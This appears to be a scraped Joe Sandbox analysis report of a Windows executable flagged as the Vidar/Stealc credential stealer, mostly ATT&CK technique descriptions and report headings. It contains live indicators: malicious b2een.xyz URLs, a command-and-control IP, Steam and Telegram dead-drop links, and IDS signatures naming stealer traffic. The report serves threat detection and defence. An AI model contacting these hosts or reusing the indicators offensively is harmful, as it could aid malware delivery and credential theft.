Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus_memset
String ID: @
API String ID: 587104284-2766056989
Opcode ID: a39fb4421f460cd711dc029c5eb0e60a29792de4ec29100063e3b6194d77edf4
Instruction ID: 19b0c987a1dbfec21fbe2755b4946762cb98c65a66c9d3a508c25fc7f99d095d
Opcode Fuzzy Hash: a39fb4421f460cd711dc029c5eb0e60a29792de4ec29100063e3b6194d77edf4
Instruction Fuzzy Hash: FEE0B8F49102089BDB00DFA4ED46B5D77B89B04704F5000159A09E7281E6B4AA098775

Source: https://b2een.xyz/sqlite3.dll	Avira URL Cloud: Label: malware
Source: https://b2een.xyz/bi	Avira URL Cloud: Label: malware
Source: https://b2een.xyz/	Avira URL Cloud: Label: malware
Source: https://b2een.xyz	Avira URL Cloud: Label: malware

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D63AB9 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00D63AB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D592A6 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00D592A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5B721 _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,	0_2_00D5B721

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:49742 -> 49.13.32.95:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.13.32.95:443 -> 192.168.2.5:49742
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.13.32.95:443 -> 192.168.2.5:49736

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199802540894
Source: Malware configuration extractor	URLs: https://t.me/fu4chmo

Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]		0_2_00D5149D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax		0_2_00D5149D

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Protection of GUI

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\delays.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
file.exe

Function 00D6A132 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Function 00D66A05 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297
filestringCOMMON

Function 00D67D20 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205
stringfileCOMMON

Function 00D5688F Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161
networkfileCOMMON

Function 00D553AA Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Function 00D55E61 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 469
networkstringmemoryCOMMON

Function 00D658C3 Relevance: 49.7, APIs: 2, Strings: 26, Instructions: 674
stringCOMMON

Function 00D69E25 Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Function 00D68705 Relevance: 37.0, APIs: 8, Strings: 13, Instructions: 249
sleepCOMMON

Function 00D51656 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129
memoryfileCOMMON

Function 00D54A56 Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 378
networkstringfileCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre